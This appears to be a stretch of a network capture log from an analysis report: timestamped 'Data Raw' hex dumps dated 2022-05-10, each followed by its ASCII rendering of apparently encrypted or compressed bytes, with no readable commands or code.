                                                                                    2022-05-10 20:11:05 UTC13INData Raw: 76 f4 55 6d e4 9c dd a1 d9 d3 02 00 c8 19 bf d9 dc bb ed 40 f7 e4 4b 14 f0 13 e0 fd a2 b1 2e 5a 85 4c 8e f4 e2 72 91 20 ea 61 1c 99 4b 2c ff 7b f0 4c 3f 11 0f 94 df ea a2 38 25 92 15 3e e2 3c 3f 9a 9b d6 4c 70 b9 22 78 2b 75 e6 bf fa d4 1b 20 1a 7b 2e 61 9a aa 8c da 39 9a 8d fb a9 1e 2a 32 bb 05 71 e0 c7 79 83 5d 91 b2 bd 7f 24 49 bb de 8f ec 1e 9e 1d 0f 8d 6f a4 b0 37 21 ce 48 25 45 1b 99 06 44 e7 43 e2 de c5 be 0f 67 1e 68 fb 6e b0 fd 74 7c 71 c0 db 9e b4 0b b6 cc 7c bb 91 ee 8d 8d ee 9d dc 7e 44 d7 32 29 e1 7d ff 3c 94 3d b7 44 ff 25 a2 49 29 13 03 f7 35 a6 e9 87 cb 3a 96 7f 06 02 52 05 64 2d 88 f7 03 13 ed 68 e3 1f 2e 86 c4 e3 e3 9a 31 57 86 86 ad 62 66 55 0e c2 97 6c d4 da 6e ca 49 83 e8 07 32 ac 86 63 45 4f 7f 33 de cb 27 f4 ca e5 4b 46 82 b8 0d bb
                                                                                    Data Ascii: vUm@K.ZLr aK,{L?8%><?Lp"x+u {.a9*2qy]$Io7!H%EDCghnt|q|~D2)}<=D%I)5:Rd-h.1WbfUlnI2cEO3'KF
                                                                                    2022-05-10 20:11:05 UTC16INData Raw: 11 0b 0e 78 a3 e0 8e da 17 09 83 c5 f4 d6 94 54 d3 ed ed 55 99 bd ed 43 2f 5d 24 2a 89 75 24 a6 31 a1 1d 4b 86 ed ad 16 d2 06 22 d4 79 de 76 c9 c0 1e bc 60 08 97 fb 1e 3b 5c 51 4c 21 86 e5 7f c1 2b bc f0 3e 51 8a 08 ef cc 8d 8d 8a 1c 1f da ec 17 14 a2 63 04 2d 4f 89 69 43 dd 6d 09 05 9f 0f 73 30 48 a2 9d 07 8e eb 65 76 62 aa ee 36 ff 76 60 ff 50 45 9c 08 32 7f 99 bf cc 9d f3 59 1e 64 f1 5f 33 5b a0 60 74 60 7f cd 6a ff 3f 69 c9 96 ef 93 60 0b 92 fa 78 7e 2f a4 c7 f6 69 c5 87 d3 b3 64 b0 17 d8 64 e0 a4 65 a5 d6 2c 89 0e 77 d5 21 6d 46 d2 f3 4f 4c 16 e3 30 92 49 e7 39 ba 2a 67 88 dc e8 97 c5 5f 87 6b eb 4d db b9 17 8b f4 2c 72 7d 66 38 ca 63 de ad 96 a6 e2 a5 0a 07 25 31 09 a1 0e d3 d1 2e fe 54 1d 16 ae be f6 33 fd 4c 6b c0 07 40 d5 06 c0 bc 5f ae 0d 04 b2
                                                                                    Data Ascii: xTUC/]$*u$1K"yv`;\QL!+>Qc-OiCms0Hevb6v`PE2Yd_3[`t`j?i`x~/idde,w!mFOL0I9*g_kM,r}f8c%1.T3Lk@_
                                                                                    2022-05-10 20:11:05 UTC17INData Raw: 50 0c 65 d1 80 bd d7 57 a8 51 ba 15 f4 cb 52 37 61 e9 b3 99 b3 ee f7 3c 63 d2 23 bd 00 a5 08 15 55 de 31 28 48 ef 3a b4 6f 5c 5b 5a 86 fa 12 54 85 d2 ba c8 de d5 5f 56 bc bd 91 0c 30 a1 c1 f8 55 57 92 57 df 37 29 90 48 3a f3 be b3 1a d4 6c a6 c4 aa ca fb 5d 91 a2 bd c5 5e c8 a6 37 d7 af 14 4f 87 9f 37 6f 96 40 a1 97 23 80 47 28 f7 92 f3 f3 14 03 97 1e 2c a0 b3 80 77 a8 e6 17 5b c1 29 06 b8 84 57 99 4c 2a bd c0 1a a1 ca 16 0f 3d b1 5d fa 91 f5 50 75 2e db 93 79 88 7e ab 79 08 b9 04 e2 d3 58 af b6 55 fc 03 af cd 8b 1c 91 60 46 14 e6 7d b9 d9 1f cd 30 22 9b cc 9c 6c d2 7f 6b d4 a6 30 e7 e2 5e 20 0d 06 2e 01 74 e4 a4 69 d4 31 54 d2 2d 48 f2 9e 17 78 0f d8 ed 5b b9 83 0b 89 6d 4d 4e 09 97 be 75 ba c4 5a 34 e6 8d a9 91 7e 55 de c0 fd 4c 6f 98 b3 03 0f e4 9c d3
                                                                                    Data Ascii: PeWQR7a<c#U1(H:o\[ZT_V0UWW7)H:l]^7O7o@#G(,w[)WL*=]Pu.y~yXU`F}0"lk0^ .ti1T-Hx[mMNuZ4~ULo
                                                                                    2022-05-10 20:11:05 UTC19INData Raw: cb 3c f7 e5 06 02 b8 62 05 2d 87 fd 2b 88 f7 68 e9 01 24 0a 9b e3 0c 93 19 cc 88 86 a7 4a e9 5f 0e c4 b0 f7 d4 da 7e dd 61 a2 e8 07 34 84 11 6a 45 45 6e 39 52 94 3d fd cb cd dc 46 82 b2 3f c8 17 d5 73 89 6d fe 0a 8e 75 19 21 01 c9 ab c8 8e b2 7d d8 67 a2 a0 5f 4f e5 53 c4 2a c0 ff 80 78 1e bf 30 8f 24 fd 30 ce 8a 94 66 14 54 13 ab 76 70 a7 2d 56 83 9a e4 97 c8 e1 cf 73 2c 18 e7 c1 73 04 85 54 b8 6f 0d 00 da 37 0b 0e 72 01 8c c7 f2 dc 07 83 cf dc 31 9f 54 d5 ca ca 55 99 ad 82 8f 2e 5d 2e 12 1f ef 2d a6 4f a1 1d 4b 82 29 8c d3 d0 09 24 fc b3 c4 76 c3 3f 1f c2 6e 08 20 f6 72 13 94 53 4c 27 6b 26 7f c1 2d 42 f1 5e 67 e5 19 e9 e4 4a 8f 8a cb 07 d3 c4 2b 16 a2 65 f3 03 4f 89 6c 2c 10 6d 13 0f b9 1f 74 18 80 a0 73 08 88 c3 59 74 62 ac 3a 18 ff 76 66 90 9d 45 86
                                                                                    Data Ascii: <b-+h$J_~a4jEEn9R=F?smu!}g_OS*x0$0fTvp-Vs,sTo7r1TU.].-OK)$v?n rSL'k&-B^gJ+eOl,mtsYtb:vfE
                                                                                    2022-05-10 20:11:05 UTC20INData Raw: d2 52 30 7d 78 7f b5 ba e7 c7 dd 1a f7 0b 8a 19 ae 02 01 72 08 08 04 40 cd ca b6 7d 1b 59 97 8d fa 1f 77 12 2d 69 31 03 cd 63 fa 58 a0 9e 0b 2d 44 af 83 5e 55 8e 88 a1 c2 46 42 42 10 e7 da 7a 1d c3 98 be d6 c5 d3 f0 5d e8 b0 43 c4 76 d2 97 65 36 6f 16 45 82 87 c1 6d bc 5b 82 bf 24 9a bf 38 dc f6 23 9c dd 09 bf 30 3a 93 5a 8f 6a 80 d3 01 a5 c6 23 d9 95 8e 57 9e 77 fc 8b ec 18 80 dc 13 67 d1 49 8a c4 bb f5 5a a8 18 ea 91 79 6f 70 ab 79 2b a1 44 6f c5 4b ab 95 58 e9 03 af cc 89 58 99 de 51 10 2c 69 b5 c5 ae d8 70 24 e1 cc 62 6d fa 54 36 c5 a2 36 de b1 41 de 0a 45 53 16 5e f0 15 7c 94 38 78 90 d1 49 d8 39 2d 62 0d e3 90 5b a8 8d 03 35 7e 23 37 16 9f 24 7a 8e ad 5e 34 fd 2b a4 2f 65 51 a9 c5 92 27 cd 89 f9 29 1b 17 9c d9 83 d1 fd 1f 19 e6 19 ae dd d7 75 ee 6c
                                                                                    Data Ascii: R0}xr@}Yw-i1cX-D^UFBBz]Cve6oEm[$8#0:Zj#WwgIZyopy+DoKXXQ,ip$bmT66AES^|8xI9-b[5~#7$z^4+/eQ')ul
                                                                                    2022-05-10 20:11:05 UTC21INData Raw: 97 e6 96 e8 2c 2f 0d 8d 9d eb 9b 19 c8 24 99 ab 46 14 5f 11 ce 41 f6 f8 d0 78 50 74 a3 e8 06 3f 9b 16 6f 45 4d 7f 34 ac 95 0b ff cc d5 f8 ac 80 b2 23 6a 08 da 7f 89 65 e6 d2 86 59 0b 07 05 c9 ab fa e8 4d 7d d7 6d cd a0 44 4f ef 58 dd 26 c0 f7 dc 7f e0 be 12 84 23 e4 1f df 8a 94 6d b6 4b 1c bd 76 78 b8 d3 57 af 8e fa 96 c8 e1 c5 0d 34 18 89 cc 1c 05 8b 54 b2 42 88 1f d3 3a 0b 06 68 ff f0 e2 e1 da 21 66 cd dc bc be b2 d7 c5 cc 3a e1 b7 82 85 25 46 22 12 17 68 da a7 63 be 1b 63 ac 83 85 d5 c6 2e 0a fc b3 d4 60 ed 0c 01 ce 6e 00 80 01 73 3f 98 4b 40 27 a6 30 70 3f 20 6e f6 59 67 e3 bb f7 f4 46 8f 82 0c f0 d2 e8 27 01 ae 65 24 15 5d 77 62 00 12 46 0c 37 cf e0 8b e7 aa a0 9d 1a b8 c7 57 bf 62 ac c6 3b ff 76 7b 92 b5 47 9d 02 1e 01 aa 97 05 95 9c 6a 0f 62 d3 67
                                                                                    Data Ascii: ,/$F_AxPt?oEM4#jeYM}mDOX&#mKvxW4TB:h!f:%F"hcc.`ns?K@'0p? nYgF'e$]wbF7Wb;v{Gjbg
                                                                                    2022-05-10 20:11:05 UTC23INData Raw: f5 8b 2c ab 14 78 4c f6 09 2c c6 52 f3 6e 71 16 6a 86 86 f3 0e 90 ed 00 47 20 0d db 44 0b bc aa b2 0e 1b b8 85 38 52 40 4e 80 c9 38 77 e8 5e 10 f9 d1 69 2a d7 66 16 fa c7 cb d5 5d ef bd ab d6 5e e7 07 0a ff 6f 16 5e 85 ae e3 6e ba 49 9f c1 06 80 41 3d 7e 4a 36 29 19 05 a5 29 28 a0 a8 90 7b 7e d5 3b 53 ff 78 db 82 85 4c 8a 6d 02 9b c4 06 55 d8 07 1e 39 9c 68 d1 95 f5 4b ac 1c 24 92 55 f5 68 b8 7d 0c b0 40 65 2d 59 83 b6 de 86 09 ae cc 92 22 a5 20 50 38 21 e5 af f7 93 dc 70 3f f3 25 9d 40 ee 4b 3d d2 a6 27 cb ad a2 21 27 7a 28 23 74 ee 02 50 96 28 7c 80 40 25 f4 3c 0c 32 0f e3 90 5b a8 8d 0e 35 7e 23 33 08 84 ba 71 83 ba 47 ca ed 03 ba fa 61 45 d1 3d 02 b5 c5 9e 25 27 7c ed ad 71 9f d7 d3 02 0a f9 29 bb d9 4c 8c ef 40 d0 e5 4b 05 d0 5b e0 ec b2 3a 25 41 85
                                                                                    Data Ascii: ,xL,RnqjG D8R@N8w^i*f]^o^nIA=~J6))({~;SxLmU9hK$Uh}@e-Y" P8!p?%@K='!'z(#tP(|@%<2[5~#3qGaE=%'|q)L@K[:%A
                                                                                    2022-05-10 20:11:05 UTC24INData Raw: b5 9f d9 42 14 57 0a ec b7 f4 d4 dc 4c f9 61 a3 e2 87 3c 84 1d 67 98 00 63 39 52 96 38 81 f8 d4 ae 4e 82 b2 21 e0 1e d7 73 8f 45 da 2c 87 7f 99 27 01 c9 af 21 a0 b1 7d d7 65 bd d6 76 56 9b 5a c4 2a c4 d7 c9 72 1e b9 16 ab 24 fd 6b 47 82 94 69 10 89 1a b2 76 70 a4 32 21 b0 83 fa 96 c8 e1 c5 5b 27 1b 89 ce 5b 20 8a 54 b2 ef 1f 00 da 32 d6 e5 70 01 f1 cc ed a4 3a 9a b1 d4 ba 96 50 fd c9 c9 55 9f 9f a6 8f 2f 57 ae 1a 1f 75 20 7b 82 ad 1d 4b 80 9e fc e0 c9 78 2c fc b3 da 5e ce 3d 1f c4 46 2c 97 ff 78 93 92 53 4c 23 73 80 7d c1 21 40 ee 24 4e fc 67 e0 e4 4a 8b a2 14 0d d3 c2 0d 32 a2 65 26 8a 47 89 63 28 cd fc 0b 0f b9 1c 6b 63 b3 b9 e3 09 88 c3 53 5c 6d af c6 17 d7 52 6a 90 97 c5 94 02 14 6a 43 e4 07 9f f3 5d 10 42 ea 74 4f 53 a6 48 57 48 25 c5 05 34 17 4d c3
                                                                                    Data Ascii: BWLa<gc9R8N!sE,'!}evVZ*r$kGivp2!['[ T2p:PU/Wu {Kx,^=F,xSL#s}!@$NgJ2e&Gc(kcS\mRjjC]BtOSHWH%4M
                                                                                    2022-05-10 20:11:05 UTC25INData Raw: a7 76 02 65 98 9d fa 09 75 f3 32 bb 36 2c d5 4f 06 49 83 86 0d 30 b0 bd a1 4a 48 8b 90 ce 21 5d 5d 7a c4 f8 fd 71 0b df 77 b9 2c d4 c0 e4 6e fc b7 bd d4 41 c0 8f f4 fe 43 18 4d 90 bc 35 77 97 46 83 ac 33 9f 5a 2a eb fd 30 e8 0b 26 41 3b 00 aa a8 9f 7b 56 c7 1c 44 f7 1c c0 82 94 4c 86 67 fc 8b ec 10 ba d2 31 cd 3d bd 6a cd 82 ee 5a b9 10 c5 b0 87 f7 5c a1 68 07 bb 92 6d d8 47 8b be c3 e9 12 b4 d3 ba a2 81 0c 5e 3e 38 74 91 c7 bc dc 7a 26 e1 c4 bf 7f cd 57 3f cd b9 25 31 b4 70 2a 1a 62 4c d7 67 e5 19 6c 87 32 7c 9b 34 57 cd c2 07 14 1c 83 b6 59 b9 8f 12 d4 45 1c 2b 1f 86 a5 6e a2 40 5b 18 fd 3e be c6 be 6a 6e 4f d6 4a cd 88 e0 2e 6b d5 8f c2 89 ec c8 1d 13 1c 18 93 d3 de 80 f5 96 ec ee 54 0e eb 08 e0 fd af a5 2c bf 84 67 92 1b e8 4f 86 ee f2 6a 04 a5 a6 36
                                                                                    Data Ascii: veu26,OI0JH!]]zqw,nACM5wF3Z*0&A;{VDLg1=jZ\hmG^>8tz&W?%1p*bLgl2|4WYE+n@[>jnOJ.kT,gOj6
                                                                                    2022-05-10 20:11:05 UTC26INData Raw: dd 6b b0 ee 16 3b 9e cb 70 4a 6d 76 38 52 9e 25 e5 c4 dc d6 29 95 b3 25 c2 04 dc 62 86 7c f8 fa 94 7a 1b 3e 0e e1 b3 fd 87 b8 77 c6 68 b8 76 56 40 e7 43 cb 02 d8 fe c3 7b 15 ae 31 95 f2 ee 6e c5 9b 9b 41 0c 55 13 bb 65 61 b7 22 4c 55 89 8b 8f d9 f6 1b 64 fa 95 a2 c8 73 05 99 44 ba 7e 18 11 ca 20 1a 1f 5a 1b f0 ce f8 cd 06 92 de 0a a9 99 56 c4 ca e2 4d 98 b7 88 9c 21 4c 21 08 0e 7b f2 70 5c a0 1f 5a 8d a9 9d d2 d0 0c 28 ed bc c4 a0 d0 31 1d d3 61 20 8f fe 72 19 97 42 43 3d 78 3c 70 c3 30 4d d9 46 7c e5 13 fb e9 5b 80 90 0b 03 05 12 36 19 a0 74 23 22 57 88 63 26 03 68 18 00 a3 c8 67 17 91 a5 8a db 9f 15 da 5f 62 ac c7 02 fb 74 7b 9f 8c 41 8a 13 11 46 84 96 05 95 f0 4e 03 0d c6 6c 31 51 9f 64 52 60 7f cf 25 3c bf 69 c3 f0 61 94 48 c1 93 eb 72 19 27 97 c5 fc
                                                                                    Data Ascii: k;pJmv8R%)%b|z>whvV@C{1nAUea"LUdsD~ ZVM!L!{p\Z(1a rBC=x<p0MF|[6t#"Wc&hg_bt{AFNl1QdR`%<iaHr'
                                                                                    2022-05-10 20:11:05 UTC28INData Raw: 18 d7 4d 1f 54 55 9f 20 32 ad a2 af 5d 4e 66 8a e2 32 6d 40 63 e2 fb d3 f4 ad c6 66 97 a3 c7 cb fd 77 f4 9c b4 c5 2f de 95 0a c8 6f 16 5e 82 9f 2e 6e 96 4c 9e 32 7c 80 41 38 e3 f7 30 f9 02 77 8b 3b 2c aa 24 85 6b ef e1 16 5b cd 1c df aa 93 56 99 63 00 e5 58 1a ab d3 38 1e 06 a0 74 c2 9b e4 5e c7 93 da 93 73 e5 76 ba 7f 18 89 c5 7c d3 5e b9 20 df e9 03 ae d8 8c 48 a8 83 50 3c 23 67 35 e0 bd dc 71 1d d3 da 9c 66 c1 db 11 d6 a6 37 e7 02 5c 20 01 41 0c 01 74 e4 11 ae 19 02 7c 8a 2e 5b f3 2d 00 2c 3e e9 97 5b bf 91 95 cc 7f 0f 31 0c 9c af 7a 84 af 5d 96 fd 24 af c7 e8 42 b8 c2 fc e8 dc 82 e0 27 65 e8 88 cd 91 70 fc 02 0a e3 0a b2 c8 c2 9d f8 dc ee e8 5c 02 64 02 ed fb 9c 1d 05 41 8f 6d 88 07 f5 ce bf 27 f0 6d 0d 15 9d 3c d3 79 ed 97 2d 16 17 71 f6 d2 a0 13 2d
                                                                                    Data Ascii: MTU 2]Nf2m@cfw/o^.nL2|A80w;,$k[VcX8t^sv|^ HP<#g5qf7\ At|.[-,>[1z]$B'ep\dAm'm<y-q-
                                                                                    2022-05-10 20:11:05 UTC29INData Raw: 52 94 2d e7 eb dc cf 57 a2 dd 39 c9 17 de 5f 85 6a ef 2a 96 62 76 12 00 c9 a1 22 9d b5 77 0a 6a a3 a0 45 48 ef 8f c2 2b c0 ff d2 64 32 b8 2f 9a 4b aa 61 c7 80 48 51 f4 54 13 b1 7e 50 a5 4b 56 83 da 55 9e c8 e1 c8 53 25 98 89 c8 33 c2 8a 54 b8 1c 3e 01 da 3c 18 2c 6c 8c da ce f2 dd 1a a0 d0 c4 37 bd 54 d5 c4 d9 71 88 b2 9d 97 3e 7e 38 0c 37 6f 25 a6 45 be 18 5d 93 a5 93 cc c8 2e 3e fd b3 d4 67 e1 2f 3b ad 44 09 97 f5 63 31 8b 70 23 0c af 2f 75 d0 03 55 9e 72 7c e5 13 f9 c6 53 e0 a7 1b 0e d9 d5 07 79 8c 64 2c 00 5e 8d 75 3d 14 e3 be 60 96 1f 74 12 93 85 82 41 05 e8 57 74 63 bf e7 00 da 69 42 81 bc 53 83 42 3c 74 9f 97 0f ec db 5e 0f 68 ca 4b 20 7d b7 69 3c 45 7e c7 0f 21 18 78 e4 98 e7 95 48 cb b8 ad 7c 76 01 be eb f4 6f eb cf ab b3 6e d5 c9 f0 63 fb 84 65
                                                                                    Data Ascii: R-W9_j*bv"wjEH+d2/KaHQT~PKVUS%3T><,l7Tq>~87o%E].>g/;Dc1p#/uUr|Syd,^u=`tAWtciBSB<t^hK }i<E~!xH|vonce
                                                                                    2022-05-10 20:11:05 UTC30INData Raw: 46 94 93 d9 ac 57 4e 51 2c 65 c0 76 00 c2 fa ae f6 d0 e3 5c 5d ef a6 9b d9 49 d0 95 1b f0 70 00 b1 80 9b 10 7e 9a 5e 19 86 67 81 41 39 ef ea 32 fc 14 18 b0 24 d2 a1 95 99 70 8c cc 87 62 0d f2 24 7d 9a 5e 8a 66 02 9b cf 05 bb 27 2a 37 0d a7 7f da 0b dd 4b a8 0b d0 43 6b f6 70 b0 51 18 a1 44 74 fb 6f ae ad d2 9d 11 af cc 83 4f 89 3f 41 2f 26 7f a8 d0 a2 cb 8e 34 c9 d4 8d 66 ce cd 06 c7 a6 36 c5 a6 58 3f 13 7a 59 01 65 e1 19 6a 6a 28 50 a0 3e 4d ee b0 39 38 16 f1 bc ec b9 89 12 dc f3 30 30 1f 96 96 c6 92 be 50 1c b6 2f b8 db 73 ab 35 e9 fd 4a cc 9a f7 34 67 f7 93 d9 98 f2 cc 13 f4 e3 35 ac c8 c6 9d c7 58 fe e5 41 98 c7 13 e0 ed a7 bf 1a 53 96 44 99 1b ec 41 87 c6 e0 4d 16 9e b9 3b 43 40 de b8 c0 e9 08 7f cd c9 a0 02 28 a5 08 17 bb 32 2e 90 8f 6e ee 49 46 d7
                                                                                    Data Ascii: FWNQ,ev\]Ip~^gA92$pb$}^f'*7KCkpQDtoO?A/&4f6X?zYejj(P>M9800P/s5J4g5XASDAM;C@(2.nIF
                                                                                    2022-05-10 20:11:05 UTC31INData Raw: d4 73 80 73 00 2d ab 70 0e 05 1e c0 a6 fc 8e ae 83 d6 4b aa a7 7c 26 e5 52 c4 37 cd ff ca 66 e0 be 12 8d 3c f0 61 ce 92 6a 68 38 50 05 ba 6f 7d a6 24 4b 7d 9b a8 96 cd e4 8b 64 fa 4c 97 c5 73 0d 90 aa b9 43 13 2b 95 2d 06 0e 7b 18 0f cf de d5 0c 80 cb cb 60 9a 00 cf c8 ca 5c 82 49 83 a3 25 5f 2b 58 8e 6a 2e 95 51 b3 10 4b 8b 97 7b d2 fc 04 33 f1 b3 d7 69 ca c0 1e ee 6c 23 92 c7 0c ec 65 ac 5b 2c 85 25 7d c4 6b d3 ee 53 53 e7 0f e3 e1 6f c5 9d cc 5a d6 8e 2d 27 67 73 06 19 7f 8b 63 11 10 6d 09 4c b9 1e 65 0e 8c 8b b2 01 80 db a9 75 4e a1 b8 26 ff 76 6e e3 d3 44 9c 08 1f 77 92 97 0d 88 0d 5e 23 60 c1 61 31 53 b0 b6 52 4c 7d d0 09 32 37 70 3d b1 d2 96 63 c3 bb 35 79 74 68 d9 c4 f6 65 c7 a0 d3 b3 7d ef d8 d8 31 ea 82 74 e6 fe 1f 9a 18 7d 91 a1 6d 4e cf 2b 90
                                                                                    Data Ascii: ss-pK|&R7f<ajh8Po}$K}dLsC+-{`\I%_+Xj.QK{3il#e[,%}kSSoZ-'gscmLeuN&vnDw^#`a1SRL}27p=c5ythe}1t}mN+
                                                                                    2022-05-10 20:11:05 UTC33INData Raw: d4 66 bd fa c7 cb b0 5d ef ac a9 c5 5a df 97 0a ff 6f 3d 06 85 9f 4a 6e 96 4c e6 e7 22 80 4b 33 f6 73 96 f8 3f 4b 97 ad 2c a0 b3 90 0e 18 d4 17 51 d4 0b cc 93 81 d9 2e bf 09 8d d7 c0 bc 0f a6 30 2e b6 74 c8 97 e3 4b ac 85 6d 27 e5 e7 74 bd 7f 1b b0 40 f0 64 70 b5 ac d8 e3 28 a4 e4 b6 5e 80 26 23 65 28 7f b3 a5 a1 db a6 22 3f cc 4a e1 fd 57 2e d7 ab 3f d9 ae c0 29 1c 6b e2 9d 7d f7 05 cc 08 2f 6a 83 35 4f dc 26 07 38 1c f9 9d d5 0e 91 c2 ce 13 2c 30 1f 97 be 71 92 ce 1a 6f c4 be b8 d1 6e c9 24 cb f4 c4 7a 9e 29 2e 54 e4 9d d9 89 a0 67 9e 03 c8 19 bf d9 dc bb ea 40 76 e5 4b 14 b0 13 e0 fd 9c 2d 05 41 8f 49 f6 92 e3 5e 99 35 e8 ef ac af 4a 2d d3 79 d6 4c 17 37 14 6a d8 b5 fa 12 27 b3 8c 3e 00 3e 3f 96 9a 91 4f 70 b9 22 5c 55 f9 51 99 2d 4f 1b 20 21 6f 0c cc
                                                                                    Data Ascii: f]Zo=JnL"K3s?K,Q.0.tKm't@dp(^&#e("?JW.?)k}/j5O&8,0qon$z).Tg@vK-AI^5J-yL7j'>>?Op"\UQ-O !o
                                                                                    2022-05-10 20:11:05 UTC33INData Raw: f6 35 98 81 69 e8 44 9e da 29 9c b8 5f ae 06 04 96 a0 c6 6d 6b 80 f9 1e f8 a6 34 c8 2c fe 56 22 2b 1a 7b 03 02 5d 19 95 cc 93 e3 a7 a7 85 2f 1d 68 3e 84 3b 0c 65 d1 fe 78 ff 1d a2 77 a1 7d c1 d2 52 3d 74 8e 11 61 b3 e4 db f1 6a df 3b 89 00 a3 0e 08 6c 99 56 29 48 ef 8b d4 7c 1d 79 98 92 d1 51 7f f8 43 87 37 00 d1 65 8b 42 ab 94 1f 3c ab a8 a8 43 50 16 3c a1 99 46 42 42 32 e8 dd 74 1f c5 6a d0 9b c6 cb f1 75 8d ad bd cf 49 d5 bd 9d ff 6f 1c 5e 8b d8 85 6f 96 4c 9a b4 32 86 50 32 e6 ec 2a 7d a3 66 16 3a 2c aa a8 80 0e 47 d4 17 51 ea a1 05 94 94 43 ec 52 02 8a c1 36 a7 c8 3f 6e 15 b6 75 c3 fe a2 5a a8 01 06 82 7f f1 66 ac f7 bb ce ed 7e d3 52 87 9c db e9 05 bc c9 89 59 85 23 5e 38 01 1c b8 df b7 d1 58 a2 e5 db 96 65 b9 cf 2e d6 ac 25 cb a4 5a 31 0f 7f 47 05
                                                                                    Data Ascii: 5iD)_mk4,V"+{]/h>;exw}R=taj;lV)H|yQC7eB<CP<FBB2tjuIo^oL2P2*}f:,GQCR6?nuZf~RY#^8Xe.%Z1G
                                                                                    2022-05-10 20:11:05 UTC35INData Raw: 61 3c f3 fb 6e ba ce 62 78 71 b0 f3 05 b4 46 bc d3 67 23 c5 9d e9 8d c6 0c d0 0d 2b fe 4b 21 ec 79 ac ef 94 3d b9 7f 81 54 8b 4e 01 82 10 f2 2e 8b fc 81 a4 16 f8 e5 0c 13 5d 72 6a 01 89 fd 21 99 e8 70 86 2d 25 0a 91 e0 cb f2 18 cc 8c 95 a3 5b 11 38 20 c5 bf fd c7 dd 75 da 70 a7 fe 16 30 0a aa 0c 6a 44 60 33 59 4a 3d e5 ce a2 b7 47 82 b8 2c a7 7f d5 73 83 b1 20 26 8e 59 1f 26 6e 9e ab fc 8d 6e 75 d0 08 b9 a1 45 45 cf 52 c4 2b dc ff c3 73 1e 81 3e 95 7c fd 6f c7 8a 94 69 16 54 1d b1 2c 18 a6 27 56 83 9a 84 85 f8 e5 c1 f4 2c 18 89 85 73 04 9b 40 b3 1c 73 01 da 3c 07 7d 17 00 f1 c4 ff d5 01 8b cb b3 a1 97 54 df aa 52 55 99 bd ed aa 2e 5d 24 01 19 06 0d a7 4f a5 0e 4e 93 84 94 d5 bf 2c 25 fc b9 cf 73 db 51 33 c3 6e 02 86 fa 6a 7c b7 52 4c 2d ad 07 16 c0 21 48
                                                                                    Data Ascii: a<nbxqFg#+K!y=TN.]rj!p-%[8 up0jD`3YJ=G,s &Y&nnuEER+s>|oiT,'V,s@s<}TRU.]$ON,%sQ3nj|RL-!H
                                                                                    2022-05-10 20:11:05 UTC36INData Raw: ab 21 06 9a 9a c4 3c 54 83 f9 1a 8f 9e 10 c8 2e e7 3c c6 2e 61 27 12 0a 71 42 f8 6e 95 8c f1 b8 8c 36 0b 60 38 ec 6d f2 64 f7 fa 78 f7 57 a3 77 ab 3a 99 d3 52 3d 4d f5 7f 99 b9 c9 4f f9 7f f0 0b 9b 07 ba 08 f8 68 da 10 20 68 e4 e5 b4 7d 35 60 8a 86 f0 30 1d ed 2c 4f 0d 36 24 b2 e8 5d a0 8d 0b 30 ab a9 b0 58 a9 99 a7 c5 21 40 7b 39 3a f9 d1 65 14 c7 61 bf eb c0 dc 05 5c c3 af a5 d6 5d df 84 0d e6 91 17 63 84 b3 11 75 85 41 89 ae 24 9f 48 c7 f1 d1 27 d8 5e 16 b5 29 2b a0 a8 93 7c 7e d5 3b 5d ce 23 e0 9c 96 50 99 78 05 91 3e 1b 87 cc 23 3b 2a b7 75 c2 b9 e6 5b a8 01 f2 e0 78 f6 7a 87 fd 10 b2 43 7e c2 5f b9 53 d9 c5 00 b8 df 9f 5c 91 27 4f 33 d7 7e 95 dd 96 d9 48 52 1b 24 63 12 a3 56 2e dc 8e 4e ce b5 56 23 0f 6c 7e 97 74 ee 00 52 8f 19 79 8a 48 48 f4 3c 56
                                                                                    Data Ascii: !<T.<.a'qBn6`8mdxWw:R=MOh h}5`0,O6$]0X!@{9:ea\]cuA$H'^)+|~;]#Px>#;*u[xzC~_S\'O3~HR$cV.NV#l~tRyHH<V
                                                                                    2022-05-10 20:11:05 UTC37INData Raw: b4 0d 94 6d 76 37 c4 81 b0 8d c6 0c da 56 d3 fd 4b 2d 9f 1b d7 a7 90 15 23 6e 87 21 8a f1 01 88 09 98 02 8f ed 8d cd 14 66 e7 06 04 26 0a 05 2d 8c d5 8b 8a ed 6e c1 be 24 0a 91 8c de 9a 19 c6 80 ae e4 49 14 51 70 a4 bf f7 d0 f2 ce df 61 a5 c0 b9 34 84 17 0c 78 44 60 33 54 bc 84 f6 cb cb ae 26 82 b2 21 e0 b3 d6 73 8f 45 40 2c 87 7f 76 12 00 c9 a1 fa e8 33 7c d7 6d cd 22 44 4f ef 41 c3 01 a3 ed c4 59 9d be 3e 85 28 fb 69 a8 aa 95 69 1e 59 1a 99 59 70 a6 27 7b 81 b1 cd 97 e0 52 c1 73 2a 0b 8d d9 77 8a 3d 42 89 55 06 04 c9 3f 1d 1d 7a 2a d8 df fb cd 01 19 dc da ab 90 53 fd e1 ca 55 93 a4 87 9e 2a 75 1f 12 1f 7f 08 af 5e aa 15 42 aa 30 85 d3 d6 17 2c eb 65 cd 7e d2 36 0e cb e0 bf a5 30 60 14 b2 d7 4d 27 a4 02 eb 1f 2f 50 f6 a0 6b f1 19 e8 ff 25 d8 8a 1a 04 0f
                                                                                    Data Ascii: mv7VK-#n!f&-n$IQpa4xD`3T&!sE@,v3|m"DOAY>(iiYYp'{Rs*w=BU?z*SU*u^B0,e~60`M'/Pk%
                                                                                    2022-05-10 20:11:05 UTC39INData Raw: 1a df 43 7f 38 d4 21 75 fd 13 0a 7f ee 89 cf 95 8a df 80 85 25 06 0f e5 eb 77 06 74 df 80 b7 d7 57 a8 5a 63 cc a7 c3 56 42 5e 86 7e 98 9f e8 c0 e6 19 cc 0b 8a 01 ca 55 06 69 fc d5 f6 5d c0 cc 83 7d 1d 79 86 90 77 0d 6e ec 2d 4e 1f 38 db 4d 1d 9c ac 98 63 e3 ba ae a5 7f 50 b2 8b ce 31 5a 42 48 38 f9 d7 7a 78 bc 66 a9 fa c7 cb fb 5d ef aa bd bf da df 80 10 ff 6f 17 5c b1 b4 1d 35 97 46 89 e8 23 80 50 2f e3 f8 19 b5 15 09 bf 3a 3d a5 ae 6a 60 ac d7 0f 48 c2 0f ca 87 9f a9 98 45 16 8c c2 32 b5 da 2b 1d 06 92 75 c2 9b 9a 96 a8 0b d0 88 6a f3 70 ba 7c 13 ac ba 7f ff 53 a6 bc dc 67 b4 9d c1 87 52 93 25 50 2d 2c 60 b0 21 bc f0 79 24 e1 d2 06 60 c9 5d 3d d3 a6 27 ca aa 52 de 0a 45 5f 39 84 ee 06 78 8b 26 6f 8f 2f 59 f1 21 f8 39 3a f5 82 56 a7 9a 1d cb 6e 0a 